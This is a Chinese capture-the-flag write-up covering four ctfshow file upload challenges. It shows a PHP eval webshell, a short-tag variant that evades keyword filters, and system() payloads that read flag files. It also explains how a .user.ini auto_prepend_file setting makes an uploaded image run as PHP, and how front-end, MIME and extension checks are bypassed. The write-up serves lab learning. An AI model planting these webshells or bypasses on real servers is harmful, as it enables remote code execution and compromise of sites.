ctfshow(151->154)--文件上传漏洞--.user.ini

Web151

进入界面:

审计:

提示是前台校验。

存在图片上传。

思路:

先编写一个一句话木马文件:

php 复制代码
//shell.php
<?php @eval($_POST[1]); ?>

既然是前端校验,我们查看页面源代码找到相关的校验内容:

说明只允许上传.png后缀的文件。

我们修改代码为允许上传.php文件:
然后上传一句话木马文件:

进入shell.php文件,POST传参1=system("ls ../");查看上一级目录,发现flag.php

php 复制代码
1=system("cat ../fla*");

得到flag.

Web152

进入界面:

审计:

在前端校验的基础上,增加了对请求头中Content-Type的验证。也称MIME验证。

思路:

先绕过前端验证。

可以和上一题一样修改前端代码,也可以将shell.php文件的后缀名修改为.png通过前端验证,然后抓包将文件的后缀名修改回去。也绕过了前端验证。

由于我们是以.png后缀上传的,所以Content-Type的值是image/png,符合服务端要求,文件成功上传。

执行系统命令:

php 复制代码
1=system("tac ../fl*");

得到flag.

Web153

进入页面:

审计:

前端验证+MIME验证+黑名单

思路:

上传.png后缀的木马,抓包修改回.php后缀:
发现文件不合规,说明后端对.php后缀名进行了过滤。

我们可以使用.user.ini文件,文件内容为:

php 复制代码
auto_prepend_file=shell.png

作用为:在访问主页文件时,会自动包含shell.png文件,将其文件内容当做php代码执行。

先将文件名修改为.user.ini.png,绕过前端验证,上传该文件,然后抓包修改:

然后用同样的方式绕过前端验证上传shell.png文件。

这时候我们在/upload处就可以实现RCE。也可以使用蚁剑连接:

找到flag.

Web154

进入界面:

审计:

前端验证+MIME验证+黑名单

思路:

上传.user.ini文件
上传shell.png文件
提示文件内容不合规。

php 复制代码
<?php @eval($_POST[1]);?> //文件内容

//怀疑是过滤了php,利用短标签绕过
<?= @eval($_POST[1]);?>

上传成功。蚁剑连接:

得到flag.

相关推荐
xixixi777772 小时前
解析一下存储安全——“它是什么”,更是关于“它为何存在”、“如何实现”以及“面临何种挑战与未来”
网络·安全·通信
运维有小邓@2 小时前
实时日志关联分析工具:智能检测潜在安全威胁
运维·网络·安全
世界尽头与你2 小时前
Go pprof 调试信息泄露漏洞
安全·网络安全·golang·渗透测试
程序猿编码4 小时前
PRINCE算法的密码生成器:原理与设计思路(C/C++代码实现)
c语言·网络·c++·算法·安全·prince
白帽子黑客罗哥4 小时前
2025漏洞挖掘学习全流程
web安全·黑客·漏洞挖掘·就业·网络安全学习路径·零基础小白
亿坊电商4 小时前
24H-无人共享KTV:如何实现安全的自助服务?
大数据·物联网·安全
飞行增长手记4 小时前
什么是高匿代理IP?安全吗?怎么选?
网络协议·tcp/ip·安全
bkspiderx4 小时前
安全扫描问题:目标主机支持RSA密钥交换(风险分析与解决方案)
安全·rsa·交换·密钥交换·目标主机支持rsa密钥交换·rsa密钥交换·rsa密钥
J***Q2924 小时前
DevOps金融服务安全要求
运维·安全·devops
Whoami!4 小时前
❼⁄₂ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 离线资源(上)
网络安全·信息安全·metasploit·searchsploit